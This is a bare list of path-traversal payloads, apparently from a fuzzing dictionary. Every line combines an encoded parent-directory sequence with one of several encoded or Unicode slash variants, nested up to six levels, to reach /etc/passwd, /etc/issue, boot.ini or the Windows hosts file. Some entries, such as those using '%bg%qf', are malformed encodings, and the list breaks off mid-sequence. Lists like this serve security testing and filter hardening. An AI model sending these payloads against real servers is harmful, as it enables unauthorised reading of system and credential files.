-%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%af%c0%5e%c0%5e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%5e%c0%5e%bg%qfetc%bg%qfpasswd -%c0%5e%c0%5e%bg%qfetc%bg%qfissue -%c0%5e%c0%5e%bg%qfboot.ini -%c0%5e%c0%5e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfpasswd -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfissue -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfboot.ini -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfpasswd -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfissue -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfboot.ini -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfpasswd -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfissue -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfboot.ini -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfpasswd -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfissue -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfboot.ini -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfpasswd -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfetc%bg%qfissue -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfboot.ini -%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qf%c0%5e%c0%5e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%5e%c0%5e%u2215etc%u2215passwd -%c0%5e%c0%5e%u2215etc%u2215issue -%c0%5e%c0%5e%u2215boot.ini -%c0%5e%c0%5e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215passwd -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215issue -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215boot.ini -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215passwd -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215issue -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215boot.ini -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215passwd -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215issue -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215boot.ini -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215passwd -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215issue -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215boot.ini -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215passwd -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215etc%u2215issue -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215boot.ini -%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215%c0%5e%c0%5e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%5e%c0%5e%u2216etc%u2216passwd -%c0%5e%c0%5e%u2216etc%u2216issue -%c0%5e%c0%5e%u2216boot.ini -%c0%5e%c0%5e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216passwd -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216issue -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216boot.ini -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216passwd -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216issue -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216boot.ini -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216passwd -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216issue -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216boot.ini -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216passwd -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216issue -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216boot.ini -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216passwd -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216etc%u2216issue -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216boot.ini -%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216%c0%5e%c0%5e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%5e%c0%5e%uEFC8etc%uEFC8passwd -%c0%5e%c0%5e%uEFC8etc%uEFC8issue -%c0%5e%c0%5e%uEFC8boot.ini -%c0%5e%c0%5e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8passwd -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8issue -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8boot.ini -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8passwd -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8issue -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8boot.ini -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8passwd -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8issue -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8boot.ini -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8passwd -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8issue -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8boot.ini -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8passwd -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8etc%uEFC8issue -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8boot.ini -%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8%c0%5e%c0%5e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%5e%c0%5e%uF025etc%uF025passwd -%c0%5e%c0%5e%uF025etc%uF025issue -%c0%5e%c0%5e%uF025boot.ini -%c0%5e%c0%5e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025passwd -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025issue -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025boot.ini -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025passwd -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025issue -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025boot.ini -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025passwd -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025issue -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025boot.ini -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025passwd -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025issue -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025boot.ini -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025passwd -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025etc%uF025issue -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025boot.ini -%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025%c0%5e%c0%5e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%5e%c0%5e%%32%%66etc%%32%%66passwd -%c0%5e%c0%5e%%32%%66etc%%32%%66issue -%c0%5e%c0%5e%%32%%66boot.ini -%c0%5e%c0%5e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66passwd -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66issue -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66boot.ini -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66passwd -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66issue -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66boot.ini -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66passwd -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66issue -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66boot.ini -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66passwd -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66issue -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66boot.ini -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66passwd -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66etc%%32%%66issue -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66boot.ini -%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66%c0%5e%c0%5e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%5e%c0%5e%%35%%63etc%%35%%63passwd -%c0%5e%c0%5e%%35%%63etc%%35%%63issue -%c0%5e%c0%5e%%35%%63boot.ini -%c0%5e%c0%5e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63passwd -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63issue -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63boot.ini -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63passwd -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63issue -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63boot.ini -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63passwd -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63issue -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63boot.ini -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63passwd -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63issue -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63boot.ini -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63passwd -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63etc%%35%%63issue -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63boot.ini -%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63%c0%5e%c0%5e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%5e%c0%5e%e0%80%afetc%e0%80%afpasswd -%c0%5e%c0%5e%e0%80%afetc%e0%80%afissue -%c0%5e%c0%5e%e0%80%afboot.ini -%c0%5e%c0%5e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afpasswd -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afissue -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afboot.ini -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afpasswd -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afissue -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afboot.ini -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afpasswd -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afissue -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afboot.ini -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afpasswd -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afissue -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afboot.ini -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afpasswd -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afetc%e0%80%afissue -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afboot.ini -%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%af%c0%5e%c0%5e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%5e%c0%5e%25c1%259cetc%25c1%259cpasswd -%c0%5e%c0%5e%25c1%259cetc%25c1%259cissue -%c0%5e%c0%5e%25c1%259cboot.ini 